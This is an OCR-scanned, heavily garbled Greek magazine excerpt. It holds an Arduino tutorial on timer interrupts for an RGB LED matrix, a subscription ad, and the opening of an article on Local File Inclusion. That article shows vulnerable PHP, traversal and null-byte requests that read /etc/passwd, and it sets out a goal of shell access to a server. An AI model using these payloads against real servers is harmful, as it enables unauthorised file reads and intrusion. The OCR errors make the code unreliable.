5 και 6. Σε γενικὲς γραμμές, eivai προτιμότερο να χρησιμοποιούμε τους 
μετρητές timer/counter 1 και timer/counter 2, καθὼς χρησιμοποιούνται 
σε λιγότερο «δημοφιλεὶς» διαδικασίες. 


Κάπου εδὠ πρέπει va ξεκαθαρίσουµε κάτι: H διαδικασία delay, αν και 
στηρἰζεται σε κάποιο απὀ τα interrupt ενὸς µετρητή, εἶναι κατασκευα- 
σµένη µε τέτοιο τρόπο ὥστε η εκτέλεση του προγράμματος να παγώνει 
ἑως ὁτου παρέλθει ἑνα προκαθορισμένο xpovikó διάστηµα. Αυτό ano- 
τελεἰ συνειδητἠ σχεδιαστική επιλογή και δεν πηγάζει απὀ τη λειτουργία 
TOV interrupt και των μετρητών. Οἱ μετρητὲς μπορούν να λειτουργούν 
όλοι ταυτόχρονα”, μάλιστα την ἰδια στιγμή nou ο επεξεργαστής EKTE- 
λεἰ κἄποιο κομμάτι κὠδικα. Επομένως, µε τη βοήθεια ενὸς μετρητὴ κι 
ενὸς interrupt μπορούμε va εξασφαλίσουµε ὁτι ἑνα κομμάτι κὠδικα θα 
εκτελεστεί σε µια συγκεκριμένη μελλοντικἠ στιγµή, evo μέχρι τότε θα 
πραγματοποιείται κἄποια ἄλλη διαδικασία! Στο δικὀ µας πρὀγραμμα, για 
παράδειγµα, αξιοποιήσαµε το perpnrr| timer/counter 1. Συγκεκριμένα, 
τοποθετήσαμε rov κὠδικα που κάνει τη σάρωση rou LED matrix μέσα 
στη ρουτίνα ενός interrupt, του συγκεκριμένου μετρητή. Μ΄ auróv τον 
τρόπο εξασφαλἰσαµε ὁτι η σάρωση rou LED matrix θα πραγματοποιείται 
πάντα σε τακτὰ χρονικὰ διαστήματα, evo στο ενδιάμεσο θα εκτελούνται 
οι υπόλοιπες εργασίες: Σχεδίαση νέου frame, απόκριση στα πατήματα 
των διακοπτὠν κ.λπ. O συγκεκριμένος µετρητής, ὁπως ὁλοι τους, npo- 
σφἑρει αρκετά interrupt sources και επιδέχεται πολλὼν ρυθμίσεων. Πριν 
φτάσουμε στο πρὀγραμμα, λοιπὸν, πρέπει να εξετάσουμε μερικὲς ακόμα 
πτυχὲς της λειτουργίας των μετρητών. 


Ελάχιστος χρόνος 


Για να λειτουργήσει ἑνας μετρητής προὐποθέτει την ύπαρξη ενὸς σήμα- 
τος χρονισμού (clock signal). Αυτό το σήμα λαμβάνεται απὀ το σύστημα 
χρονισμού του ἰδιου του επεξεργαστήθ”. Έτσι, οι μετρητὲς του Arduino 
λειτουργούν µε το σήμα των 16MHz, το οποίο ρυθμίζει και τη λειτουρ- 
yia του επεξεργαστἠ. AUTÒ συνεπάγεται ὁτι η τιµή του εσωτερικού KA- 
ταχωρητἠ τους αυξάνεται 16 εκατομμύρια φορὲς το δευτερόλεπτο! Με 
ἄλλα λόγια, ο χρόνος μεταξύ δύο διαδοχικὠν αυξήσεων στην τιµή τους 
(η περἰοδος) αγγίζει μόλις ra 62,5nsec. Μήπως μετράνε πολὺ γρήγορα; 
H αλήθεια εἶναι πως ναι -- τουλάχιστον για τις περισσότερες εφαρμογέἑς. 
Ευτυχώς, το hardware των μετρητών μπορεὶ να περιορἰσει αυτό το ρυθμό 
δραστικἀ. Συγκεκριµένα, µπορεί να διαιρέσει το σήμα χρονισμού rou ENE- 


6. Η αλήθεια εἶναι ότι οι μετρητές μπορούν να λειτουργήσουν και µε «εξωτερικἁ» σήματα, τα οποία έχουμε τη 
δυνατότητα να εφαρμόσουμε σε συγκεκριμένους ακροδέκτες του Arduino. Ωστόσο, αυτός ο τρὀπος λειτουργίας 
εἶναι μάλλον προχωρημένος και δεν χρειάζεται va µας απασχολεί eni του παρὀντος. 
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ξεργαστήἠ µε το 8, το 64, το 256 ἡ ro 1024. Ἔτσι, ο ρυθμός evóg µετρη- 
Tj μπορεί va µειωθεὶ ora 2MHz (16MHz/8), στα 250KHz (16MHz/64) και 
ούτω καθεξἠς. Avrioroixa, η περἰοδός ενὸς µετρητἠ (o χρόνος ανάμεσα 
σε δύο διαδοχικὲἐς αυξήσεις του καταχωρητή του) μπορεί να αυξηθεί στα 
500nsec (62,5nsec * 8), στα 4usec (62,5nsec * 64) και πάει λέγοντας. H 
διαίρεση rou σήματος χρονισμού πραγματοποιείται απὀ ἑνα κύκλωμα nou 
ονομάζεται prescaler. 


Για την καλύτερη κατανόηση των παραπάνω, θα λύσουμε éva απλὀ npo- 
βληματάκι. Ας υποθέσουμε ὁτι ἐχουμε ενεργοποιήσει évav μετρητή, 
καθώς και ro interrupt που προκαλεἰται anó την υπερχείλιση (overflow 
interrupt). Με ποια συχνότητα θα εκτελείται η ρουτίνα εξυπηρέτησης 
(ISR) του συγκεκριμένου interrupt; Πα να µην πελαγώσουμε, θα πρέπει 
να σκεφτούμε υπολογίζοντας τα επιµέρους χρονικά διαστήματα: O xpó- 
νος για µια αὐξηση στην τιµή του μετρητή ισούται µε την περἰοδο του 
σήματος χρονισμού του επεξεργαστή (αυτά ra 62,5nsec), πολλαπλασια- 
σμένη µε την τιμή του prescaler. Όμως yia την εκτέλεση rou interrupt ο 
μετρητἠς πρέπει να υπερχειλἰσει. H υπερχείλιση συμβαίνει όταν ο µετρη- 
τὴς ἐχει φτάσει στη μέγιστη τιμὴ και αφού περάσει µια ακόμα περἱοδὸς 
του (οπότε και μηδενίζεται). Επομένως, ο χρόνος που μεσολαβεί ανάμεσα 
στις ενεργοποιήσεις του interrupt, ισούται µε την περίοδο του µετρη- 
τὴ, πολλαπλασιασμένη µε τη μέγιστη Tip στην οποία µπορεἰ να φτάσει 
Ἑαφοῦξ προηγουμένως την αυξήσουμε κατὰ μία μονάδα. Όλα αυτά φαἰ- 
νονται ξεκάθαρα στην ακόλουθη σχέση: 


Interrupt period = System clock period * Presaler setting * 
(Timer max value + 1) 


Topa που γνωρίζουμε την περίοδο επανάληψης rou interrupt, μπορούμε 
να υπολογίσουμε και την αντίστοιχη συχνότητα. Ως γνωστό, η συχνότη- 
τα εἶναι αντίστροφη της περιόδου. Με άλλα λόγια, ισχύουν τα ακόλουθα: 


Interrupt frequency - 1 / Interrupt period 
System clock period - 1 / System clock frequency 


Συνδυάζοντας όλα τα παραπάνω, προκύπτει η απάντηση oro πρὀβλημά 
μας: 
Interrupt frequency = System clock frequency / (Prescaler 
setting * (Timer max value + 1)) 


Αυτή η σχέση εἶναι ιδιαιτερα χρήσιμη και θα σας χρειάζεται κάθε φορά 
που θέλετε να χρησιμοποιήσετε ro overflow interrupt ενὸς µετρητή. 


Εικόνα 3 

Η υλοποίησή µας 
στο breadboard 
ξεκίνησε απὀ τους 
shift registers. Τα 
τσιπάκια TONO- 
θετήθηκαν σε 
απόσταση μεταξύ 
τους, WOTE να µη 
μπλεχτούν τα KA- 
λώδια προς το LED 
matrix. Στην εικόνα 
έχουμε συνδέσει 
µόνο την τροφο- 
δοσία των τσιπ, 
καθώς kai µερικἀ 
σκόµα σήματα, 
όπως ro Output 
Enable, ro master 
reset k.An. 
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Καταστάσεις λειτουργίας 


Οι μετρητὲς συμμετέχουν σε πολλὲς εργασἰες του συστήµατος και uno- 
ρούν να λειτουργήσουν µε αρκετούς διαφορετικούς τρόπους. Αρκεί va 
πούμε ὁτι το datasheet του επεξεργαστή rou Arduino, αφιερώνει περί τις 
20σελἰδες για κάθε μετρητή! (www.atmel.com/Images/8161s.pdf) Εμείς θα 
σταθούμε σε uia κατάσταση λειτουργίας µε ro ὀνομα CTC (Clear Timer 
on Compare match), την οποία θα αξιοποιήσουμµε και στο πρὀγραμμὰ µας. 
Ένας μετρητἠς που λειτουργεί σε αυτό το mode αυξάνει πάντα μέχρι ἑναν 
αριθµὀ που ορίζει ο χρήστης κι όχι μέχρι το μέγιστο αριθμὀ, τον οποίο 
επιτρέπει ο timer/counter register. Όταν Φτάνει στον αριθµό που ἐχει 
καθορίσει ο χρήστης και μετὰ την πάροδο µιας περιόδου, υπερχειλίζει και 
αρχίζει να μετρὰ ξανὰ απὀ το μηδὲν. Με ἄλλα λόγια, ἑνας µετρητής στο 
CTC mode λειτουργεί µε το γνωστό τρόπο, µε τη διαφορὰ ὁτι το ὁριο στη 
µἐτρησή rou ορἰζεται απὸ το χρήστη. Προφανώς, auro το opio δεν µπορεί 
να υπερβαίνει το ὀριο που θέτει ο αντἰστοιχος timer/counter register. Για 
παράδειγµα, σε évav οκτἄμπιτο μετρητή δεν μπορούμε να επαναπροσ- 
διορἰσουµε τη μέγιστη τιµή σε κἀτι μεγαλύτερο απὀ 255. Σε αυτὴ την 
κατάσταση λειτουργίας ισχύει η ακόλουθη σχέση: 


Interrupt frequency = System clock frequency / (Prescaler 
setting * (Timer values + 1)) 


Όπου Timer values εἶναι το νέο ὀριο, το onoio έχουμε θέσει χειροκίνητα 
για το μετρητή. 


Απὀ ψηλὰ... 


Έχοντας παρουσιάσει τα απαραίτητο θεωρητικὀ υπόβαθρο, μπορούμε 
επιτέλους να προχωρήσουμε στην υλοποίηση. Βέβαια, ὁπως αναφέραμε 
και νωρίτερα, το κύκλωμα δεν παρουσιάζει καμία ιδιαιτερότητα και κανὲ- 
να νέο στοιχείο. Όλο το ενδιαφέρον εντοπίζεται στον κὠδικα, ο οποίος 
παρουσιάζει πολλὲς και σημαντικές αλλαγές (πάρτε τον απὸ το http:// 
bit.ly/dh006colormatrix). 


To πρώτο πράγμα nou θα παρατηρήσει κανεἰς’, apopå στην ενσωμάτωση 
της βιβλιοθήκης pgmspace. Αυτή η βιβλιοθήκη επιτρέπει την τοποθέτηση 
δεδοµένων στη μνήμη προγράµµατος του Arduino, ενώ περιλαμβάνει και 
όλες τις απαραίτητες διαδικασίες yia τη μετέπειτα ανάγνωση των ano- 
θηκευμένων δεδομένων. Εμεὶς τη χρησιμοποιήσαμε για την αποθήκευση 
των εξωγήινων μορφών, τις οποίες θέλαμε va προβάλουμε στο matrix. 
Φυσικά, τα σχετικἁ δεδοµένα θα μπορούσαν να τοποθετηθούν σε vav 
«απλό» nivaka, ο οποίος θα αποθηκευόταν στη μνήμη SRAM. Ωστόσο 
η συγκεκριμένη μνήμη εἶναι σχετικά μικρὴ και θα ἠταν καλὸ να µην τη 
γεμίζουμε µε μεγέθη ra οποία δεν πρὀκειται να αλλάξουν κατά την εκτὲ- 
λεση του προγράµµατος. Ακριβώς γι’ αυτό, ορίσαµε rov σχετικὀ nivaka 
ως εξής: 
prog uchar aliens[] PROGMEM - ( 
B11000001, 


B10000110, 


Παρατηρείστε τη χρήση της δεσμευμένης λέξης PROGMEM, καθὼς και 
τον τύπο δεδομένων του πἱνακα. Η λέξη ΡΒΟΟΜΕΜ δηλώνει στο µετα- 


7. Εἶναι η πρώτη φορά που χρησιμοποιούμε βιβλιοθήκη του Arduino :) 
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γλωττιστὴ ὁτι ο συγκεκριμένος πἰνακας θα πρέπει va αποθηκευτεὶ στη 
μνήμη προγράµµατος κι ὀχι στην 5ΒΑΜ. Όσο yia τον τύπο prog. uchar, 
αποτελεὶ ¿vav τύπο δεδομένων που ορἰζει (και υποστηρἰζει) η βιβλιοθήκη 
pgmspace. Ουσιαστικά, ο συγκεκριμένος τύπος εἶναι «ισοδύναμος» µε 
τους γνώριμους byte kai char. 


To πρὀγραμμα συνεχίζει µε rov (εκτενἠ) opicuó των δύο frame buffer. 
Αυτἠ τη φορὰ, το πρὀγραμμα θα διατηρεἰ πληροφορίες για τρία LED ανά 
κουκκίδα. Ακριβώς γι’ αυτό, το μέγεθος των frame buffer ἐχει τριπλα- 
σιαστεἰ. Μπορεί η μνήμη SRAM να µην κινδυνεύει να γεμίσει, αλλά η 
διεύρυνση των frame buffer μας θύμισε ὁτι πρέπει να εἰμαστε προσεκτι- 
koi µε τη χρήση της μνήμης. Παρεμπιπτόντως, αυτός ἦταν κι ἑνας anó 
τους λόγους για τους οποίους σκεφτήκαμε να τοποθετήσουµε ὁλες τις 
σταθερὲς στη μνήμη προγράμματος. Πριν ξεκινήσει η συνάρτηση setup, 
μεσολαβούν ορισμένες ακόµα δηλώσεις μεταβλητών. Το πρὀγραμμὰ µας 
εισαγάγει νεοτερισμούς Ἔκαιξ εδώ: 


volatile int keypad value - 0; 
volatile byte keypad timer - 0; 
volatile boolean keypad lock = 0; 
volatile byte index = 0; 

volatile byte row selector - 0; 
volatile byte scan counter - 0; 


Ὅπως βλέπετε, η δήλωση ορισμένων μεταβλητών ξεκινά µε τη δεσµευ- 
μένη λέξη volatile. Πρόκειται για μία οδηγία προς το μεταγλωττιστή, η 
οποία επιβάλει την τοποθέτηση των συγκεκριμένων μεταβλητών στη 


Εικόνα 4 

Το κύκλωμα 
συνεχίστηκε µε 
την προσθήκη του 
matrix. Όπως βλέ- 
πετε, η απόσταση 
ανάμεσα στους 
shift registers μάς 
βοήθησε αρκετά. 
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Εικόνα 5 

To κὐκλωμά µας 
ολοκληρωμένο. Το 
Arduino περιμένει 
τον κατάλληλο κὠ- 
δικα, ὥστε ν΄ αρχί- 
σει να ζωγραφίζει 
πόνω στο ἐγχρωμο 
LED matrix! 
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μνήμη SRAM κι ὀχι σε κἀποιον npocopivó καταχωρητή του επεξεργα- 
στἠδ. H επιλογή των μεταβλητὼν που επιβάλαμε να τοποθετηθούν στη 
μνήμη δεν ἐγινε τυχαία. Πρόκειται για μεταβλητές οι οποίες τροποποιού- 
νται μέσα στη ρουτίνα εξυπηρέτησης rou interrupt. H τροποποίηση ενὸς 
καταχωρητἠ μέσα σε µια ISR ενδέχεται va ἐχει απρόσμενα αποτελέσµατα 
στο πρὀγραμμα. AUTÒ οφεἰλεται σε μερικὲς ιδιαιτερότητες της λειτουργί- 
ας του μεταγλωττιστή. Επομένως, πρέπει να θυμόμαστε πάντα τον εξἠς 
κανόνα: Οι μεταβλητές που ενδέχεται να τροποποιηθούν στη ρουτίνα 
εξυπηρέτησης ενός interrupt, πρέπει να δηλώνονται σαν volatile! 


Μετὰ anó τα παραπάνω, ξεκινά η καθιερωμένη συνάρτηση setup. Εδὠ, 
τα νέα στοιχεία αφορούν στη ρύθμιση του timer/counter 1. Οι ρυθμίσεις 
ενεργοποιούν τον prescaler και επιλέγουν τη διαίρεση του σήματος χρο- 
νισμού µε το 1024, ενὠ θέτουν το μετρητή στην κατάσταση CTC. Όλα 
αυτά επιτυγχάνονται αποδίδοντας τις κατάλληλες τιμές στους καταχω- 
ρητὲς ελέγχου του μετρητή, TCCR1A και TCCR1B. Περισσότερα για τους 
καταχωρητές του μετρητή µπορείτε να διαβάσετε στο datasheet του ens- 
ξεργαστή και συγκεκριµένα στις σελίδες 136 έως 142. Τέλος, στην ἴδια 
περιοχἠἡ ορἰζουμε σαν μέγιστη τιμὴ για τον μετρητή το 124 και ενεργοποι- 
οὖμε το σχετικὀ interrupt. O προσδιορισμός της μέγιστης τιμής TOU pE- 
τρητἠ πραγματοποιείται μέσω του καταχωρητή OCR1A (Output Compare 
Register 1A). Κατά συνέπεια, το interrupt που ενεργοποιείται órav υπερ- 
χειλίζει ο µετρητής, εἶναι το «Timer/Counter 1 Compare Match A». 


8. 0 επεξεργαστής rou Arduino διαθέτει 32 προσωρινούς καταχωρητές. Αυτοί οι καταχωρητές αποτελούν το 
ταχύτερα προσπελάσιµο κομμάτι μνήμης, το οποίο μπορεί να συμμετάσχει άμεσα σε οποιαδήποτε αριθµητικἡ 
ἡ λογική πράξη του επεξεργαστή. Σε γενικὲς γραμμές, λοιπὀν, όταν το πρόγραμμά μας χρησιμοποιεί Avec με- 
ταβλητές, ο μεταγλωττιστής προσπαθεί να τις χωρέσει σε αυτούς καταχωρητές, ώστε να περιοριστεί η σχετικά 
χρονοβόρα αναφορά στη μνήμη SRAM. 
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Pouriva σάρωσης 


O κὠδικας yia τη σάρωση rou matrix ἐχει rTonoO0erTnOsi µέσα στη pouri- 
va εξυπηρέτησης rou interrupt. Σύμφωνα µε τη μαθηματικἠ σχέση nou 
αναφέραμε νωρίτερα kai TIG ρυθμίσεις που πραγματοποιήσαμε στην apx 
του προγράµµατος, η συγκεκριμένη ρουτίνα θα εκτελεἰται µε συχνότητα 
125Hz (125 φορὲς το δευτερὀλεπτο). Επομένως, η οθόνη µας θα έχει 
refresh rate στα 125Hz! Ας δούµε noc ξεκινά η ρουτίνα εξυπηρέτησης 
TOU interrupt: 


ISR(TIMER1 COMPA vect) 
το. 


Το ISR αποτελεὶ èva macro που αναγνωρίζει ο μεταγλωττιστής και 
TO οποίο δέχεται σαν παράμετρο τη διεύθυνση ενὸς interrupt service 
routine. Αναρωτιέστε που βρήκαμε τη διεύθυνση για ro interrupt που µας 
ενδιέφερε; Ἐνας πἰνακας µε ὁλα ra interrupt rou Arduino, καθώς και τις 
αντίστοιχες παραμέτρους για το εν λόγω macro, βρίσκεται στη σελἰδα 
www.nongnu.org/avr-libc/user-manual/group avr  interrupts.html 


To μεγαλύτερο µέρος της ρουτίνας σάρωσης καταλαμβάνεται απὀ ἑναν 
βρὀχο, ο οποίος επαναλαμβάνεται οκτὠ φορὲς. Όπως αντιλαμβάνεστε, 
κάθε επανάληψη ενεργοποιεί και µια διαφορετικἠ γραμμὴ του matrix. H 
λογική µε την οποία αποστέλλονται τα δεδοµένα στους shift register £i- 
vai όμοια µε αυτή που συναντήσαμε kai στα προηγούμενα προγράμματά 
μας. Ωστόσο, ο συγκεκριμένος βρὀχος παρουσιάζει δύο σηµεἰα ιδιαίτερου 
ενδιαφἐροντος. Καταρχάς, η πληροφορία για κἆθε χρώμα αποστέλλε- 
ται ξεχωριστά, ενώ τα subpixel διαφορετικού χρώματος εἰναι κάθε φορά 
απενεργοποιημένα. Αυτὸ, ὀπως εξηγἠσαµε στην ενότητα για το hardware 
του κυκλώματος, γἱνεται ὥστε οι ἐξοδοι των shift register να µην υπερ- 
φορτώνονται και τα LED να ανάβουν κανονικἀ. Δείτε για παράδειγµα το 
τµήµα κὠδικα που ενεργοποιεί ra κὀκκινα subpixel: 


SPDR = frame_buffer1[index]; 
while(!(SPSR & (1<<SPIF))); 


SPDR = 255; 
while(!(SPSR & (1<<SPIF))); 
SPDR = 255; 


while(!(SPSR & (1<<SPIF))); 
SPDR = row_selector; 
while(!(SPSR & (1<<SPIF))); 
PORTB |= DATA_LATCH; 

PORTB &= ~DATA_LATCH; 
delayMicroseconds(500); 


Παρατηρεἰστε ὁτι στους shift register nou οδηγούν τα μπλε και ra npà- 
oiva subpixel, αποστέλλονται οκτὠ ἁσσοι (το 255). Εξαιτίας της συνδε- 
σµολογἰας των LED εντός rou matrix, στέλνοντας τους ἄσσους εξασφαλἰ- 
ζουμε ὁτι τα μπλε και τα πράσινα subpixel θα παραμείνουν ανενεργἀ. Με 
ἄλλα λόγια, βεβαιώνουμε πως μόνο τα κὀκκινα θα εἶναι ενεργοποιημένα. 
H ἴδια τακτικἠ ακολουθεἰται και κατὰ την οδήγηση των ἄλλων subpixel. 
Τέλος, αποστέλλεται και το byte row. selector, το οποίο εἶναι kardAAn- 
λα κατασκευασμένο, ώστε να ενεργοποιεἰ κάθε φορά μία μεμονωμένη 
γραμμὴ rou matrix. Αμέσως μετά, ακολουθεί µια µικρή καθυστέρηση. H 
ὑπαρξὴ της επιτρέπει στα μάτια µας να (προλάβουν να) αντιληφθούν την 
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ενεργοποίηση των LED. Σημειώστε πως aurr| η καθυστέρηση δεν εἶναι 
ἴδια για όλα τα χρώματα! Όπως εἰχαμε αναφέρει νωρίτερα, ra διάφο- 
ρα subpixel rou matrix έχουν anó τη φύση τους διαφορετικἠ φωτεινό- 
τητα. Πα να τις ισοσταθµίσουμε, λοιπὀν, φροντἰζουµε ὠστε τα πράσινα 
subpixel, που εἶναι τα φωτεινότερα, να παραμένουν ενεργὰἁ για το λιγότε- 
po χρόνο. Με την ἰδια λογικἠ, τα μπλε subpixel, που παρουσιάζουν μέτρια 
φωτεινότητα, παραμένουν ενεργἁ για ἑνα «μέτριο» χρονικὀ διάστηµα. Ta 
κόκκινα παραμένουν ενεργά yia το μεγαλύτερο διάστηµα, καθὼς εἶναι ra 
πιο αδύναμα subpixel. 


Στη ρουτίνα εξυπηρέτησης rou interrupt ελέγχονται και οι διακόπτες. 
Επομένως, ελἐγχονται και αυτοί µε την ἴδια συχνότητα nou σαρώνεται 
TO matrix (125 φορὲς το δευτερὀλεπτο). Κατά τα γνωστὰ, αν εντοπιστεἰ 
κάποιο πάτημα, ο ἐλεγχος των διακοπτὠν απενεργοποιεἰται. Αυτό συµ- 
βαίνει προσωρινά, ὡστε να αγνοηθεί ο θόρυβος αναπήδησης των διακο- 
πτὠν (bounce noise). Τέλος, πριν προχωρήσουμε στον κύριο βρὀχο του 
προγράμματος (main loop), πρέπει να τονίσουμε µια κρίσιμη λεπτομέρεια: 
Όταν ενεργοποιείται µια ISR και μέχρι να ολοκληρωθεἰ η εκτἐλεσή της, 
τα υπόλοιπα interrupt απενεργοποιούνται. Επομένως, µέσα στη ρουτίνα 
εξυπηρέτησης evóg interrupt θα ἦταν σφάλμα να χρησιμοποιήσουμε µια 
διαδικασία που στηρἰζεται σε interrupt. Επομένως, µέσα σε µια ISR θα 
πρέπει οπωσδήποτε ν΄’ αποφεύγουμε τη χρήση rov delay() και millis(). 


Κύριος βρὀχος 


Εδώ ra πράγματα εἶναι πιο γνώριμα. Πλέον, το πρὀγραµμµα ἐχει ξεμπερδέ- 
Ψει µε τη σάρωση rou matrix kai τον ἐλεγχο των πλήκτρων, ενὠ ἐχουμε 
εξασφαλίσει ὁτι και οι δύο διαδικασίες θα πραγματοποιούνται µε απὀλυ- 
τη περιοδικὀτητα. Έτσι, ο κύριος βρὀχος του προγράµµατος μπορεἰ να 
αφιερωθεἰ στις υπόλοιπες εργασἰες. Apyikà καλείται µια συνάρτηση, n 
οποία ελέγχει αν ἐχει πατηθεἰ κἀποιος διακόπτης και αντιδρἁ καταλλἠ- 
λως. Στη συνέχεια καλείται η συνάρτηση draw, new. frame(), της οποίας 
η αποστολἠ νομἰζουμε ὁτι εἶναι προφανής. Εδώ, ενδιαφέρον παρουσιάζει 
µόνο η χρήση µιας ειδικἠὴς συνάρτησης, η οποία ανήκει στη βιβλιοθήκη 
pgmspace. Αναφερόµαστε στη συνάρτηση pgm read byte(), η οποία 
επιστρέφει ἑνα byte anó τη μνήμη προγράµµατος. Με τη χρήση της κα- 
ταφέρνουµε να διαβάσουμε τα δεδομένα για τις εξωγἠινες μορφὲς, τα 
οποία ¿xouv αποθηκευτεί στη μνήμη προγράµµατος. Έχετε υπόψη σας ὁτι 
η διάρκεια εκτέλεσης της pourivac draw, new. frame() δεν µας απασχο- 
λεἰ καθόλου. H σάρωση rou matrix θα πραγματοποιείται ούτως ἡ ἄλλως, 
σε τακτά χρονικὰ διαστήματα. Όταν ολοκληρωθεί η σχεδίαση του νέου 
frame, ο κύριος βρόχος του προγράµµατος καλεί τη συνάρτηση update — 
buffers(). H συγκεκριµἑνη διαδικασία περιμένει ἑως ὁτου ολοκληρωθεί 
ἑνα ελάχιστο πλήθος σαρώσεων του matrix. Τότε, αντιγράφει το δευτε- 
ρεύον frame buffer επάνω στο πρωτεύουν. Με αυτὸν ro μηχανισμὸ, εξα- 
σφαλἰζουμε ὁτι αν η σχεδίαση των νέων frame ολοκληρώνεται πολύ γρἠ- 
γορα, το frame rate του προγράμματος θα παραμείνει σχετικἁ σταθερὀ... 


Ελπἰζουμε να µην σας κουράσαμε. H αλήθεια εἶναι ὁτι αναφερθήκαµε σε 
πολλὰ νέα πράγματα, η κατανόηση των οποίων απαιτεὶ χρόνο και πειρα- 
ματισμὸ. Σαν άσκηση, θα σας nporsivaus τη δημιουργἱα ενὸς απλού npo- 
γράμματος που χρησιμοποιεί timer interrupts, για να αναβοσβήνει μερικά 
LEDs avà δευτερόλεπτο. Σας ευχόμαστε καλἠ τύχη και περιμένουμε τις 
υλοποιήσεις σας στο σχετικὀ forum του περιοδικού: http://deltahacker. 
gr/forum/hardware/diy-electronics. 


save 


«ρε 


«ο 


Το deltaHacker είναι το μοναδικό στο χώρο των 
περιοδικών έντυπο που ασχολείται αποκλειστικά 
κι αληθινά µε τον κόσμο του ethical hacking, 
γυρίζοντας συστηµατικά την πλάτη του στον 
καθωσπρεπισµό κι αδιαφορώντας παντελώς για την 
ασφάλεια της θεωρίας. 


Το deltaHacker είναι τόσο σίγουρο για τον εαυτό του 
και τόσο τίμιο κι ευθύ απέναντι στον αναγνώστη, 
που αντί να γυρνάει εδώ κι εκεί στα περίπτερα και ν΄ 
αγωνίζεται να φανεί ανάμεσα στις Σούπερ-Κατίνες 
και στα PC-something-bored, έρχεται κατευθείαν 
στο σπίτι σας - κι έρχεται για να σας κατακτήσει. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους WÇ άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα δίκτυο 
που αρχίζει και τελειώνει µε το Facebook και το 
Twitter, τότε είναι 10276 βέβαιο ότι θ’ αγαπήσετε το 
deltaHacker, καθώς κι ότι θα θέλετε την παρέα του 


και τους 12 µήνες του χρόνου! 


Όλες ot πληροφορίες για όλα τα προγράµµατα 
συνδροµών είναι στο 


deltahacker.gr/subscriptions 


Παραγγείλετε τώρα µία από τις συμφέρουσες 
συνδρομές από το 


deltahacker.gr/order 


deltaHacker: Hacking for the rest of us. 


Τι θα λέγατε va αποκτήσουμε shell access σε ἑναν 
server; Μετά anó αυτό, η αναβάθµιση σε root access 
θα αποτελεί μόνο θέμα χρόνου! Επίσης, πὼς θα σας 
φαινόταν av υποχρεώναμε τον Server-oTÓyo να 
γράψει μόνος του τον κὠδικα nou θα µας ανοίξει την 
πόρτα; Εντάξει, ὀχι ακριβὼς μόνος rou: H αλήθεια 
εἶναι ὅτι θα τον βοηθήσουμε κι εμείς λίγο :) 
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H aóuvayia pe την onoia θα ασχοληθούμε ονομάζεται Local File Inclusion 
ἡ απλά LFI. Εκμεταλλευόμενοι τη συγκεκριμένη ευπάθεια εἶναι δυνατὸν 
να διαβάζουμε αρχεία του server, στα οποία κανονικἁ δεν θα εἰχαμε Ka- 
μία πρὀσβαση. Σκεφτεἰτε για παράδειγµα να αποκτούσατε πρὀσβαση στο 
αρχείο passwd ενὸς Unix-like συστήματος. Απὸ αυτό θα μπορούσατε να 
εξαγάγετε πολύτιμες πληροφορίες, ὁπως επἰσης να φτιάξετε ¿va script 
και να το αφήσετε να κάνει αλλεπάλληλες δοκιμὲς μέχρι να βρει τον 
κωδικὀ κάποιου χρήστη. Βέβαια, auró που μόλις περιγράψαμε αποτελεἰ 
μια απλοϊκή προσέγγιση στο ζήτημα. Ὅπως θα δούμε στη συνέχεια, οι 
επιθέσεις που εκμεταλλεύονται τις αδυναμἰες LFI εἶναι πολύ πιο ὑπουλες 
κι όταν πετυχαίνουν μπορούν να ἔχουν ἄμεσα κι εντυπωσιακἀ ANOTE- 
λέσματα! Ὅμως πριν φτάσουμε σε ὁλα αυτά πρέπει, προηγουμένως, va 
κατανοήσουμε τη φύση rov αδυναμιών LFI. Ας δούμε va κομμάτι κὠδικα 
που πάσχει απὀ LFI, yia να καταλάβουμε καλύτερα τι παίζει... 


«?php 
$file = $ GET[file]; 
include($file); 

7» 


Σε auró το κομμάτι κὠδικα, ¿va αθώο request anó κἀποιον browser θα 
ἡταν το εξής: 


http://site.org/index.php?file-contact.php 


Όπως καταλαβαίνετε, το συγκεκριµένο request θα εμφάνιζε τη σελίδα 
contact.php. Ως εδώ, ὁλα εἶναι ὀμορφα κι ωραία. Όμως τι θα συνέβαινε 
αν το request ἦταν ύπουλο και ζητούσε πράγματα που δεν πρέπει; Σκε- 
Φτείτε ¿va request που έχει uia απὀ τις ακόλουθες μορφές: 


http://site.org/index.php?file-/etc/passwd 
http://site.org/index.php?file-../../../etc/passwd*$00 


Μπορείτε va φανταστεὶ τι θα γίνει; H απάντηση πιστεύουμε Ori εἶναι npo- 
Φανἠς: Αντί για κἄποια σελίδα του site, θα εμφανίζονταν τα περιεχόμενα 
του αρχείου /etc/passwd. Βλέπετε, στο απὀσπασμα κὠδικα nou παραθέ- 
caue προηγουμένως, η παράμετρος nou εισάγεται στη διαδικασία include 
δεν υφίσταται κανέναν ἐλεγχο! Το σωστὸ θα ἦταν να πραγματοποιούνται 
apkeroi ἐλεγχοι στην τιµή της μεταβλητὴἠς file, ώστε να επιβεβαιώνεται 
ὁτι ἐχει «νόμιμο» περιεχόμενο. Μάλιστα, αυτοί oi ἐλεγχοι θα έπρεπε va 
εἶναι σωστά σχεδιασμένοι, ὥστε να µην αφήνουν *kavéva* περιθώριο 
για πονηριὲς. Δείτε ξανά το δεύτερο anó τα ὑπουλα request που αναφέ- 
pape προηγουμένως. Πρόκειται για µια βελτιωμένη εκδοχἠ του πρώτου, 
η οποία φιλοδοξεί να ξεπεράσει va ενδεχόμενα «χαλαρό» φίλτρο για 
την τιμή της file. Συγκεκριµένα, αυτὸ το request αξιοποιεί τις τεχνικὲς 
Directory Traversal Attack (en.wikipedia.org/wiki/Directory traversal. 
attack) kai Null Poison Attack (http://hakipedia.com/index.php/Poison . 
Null Byte). 


Null Poison Attack 


Ας σταθούμε λἰγο σε αυτή την τεχνικἠ. Ἐχει ιδιαἰτερο ενδιαφέρον, αφε- 
νὸς γιατὶ στηρἰζεται σε µια πολύ ἐξυπνη ιδέα κι αφετέρου γιατὶ θα µας 
χρησιμεύσει στη συνέχεια. Ας υποθέσουμε ὁτι έχουμε εντοπίσει ἑνα site 
µε την ευπάθεια LFI. Ας υποθέσουμε, επἰσης, ὁτι ο κὠδικας µε την aðu- 
ναμἰα ἐχει την ακὀλουθη µορφή: 


include($file.'.php); 


Server κερνάει, server πίνει! 
VNPT 


Αρχείο Επεξεργασία Προβολή Βοήθεια 
</table></td> 
</tr> 


<tr> 

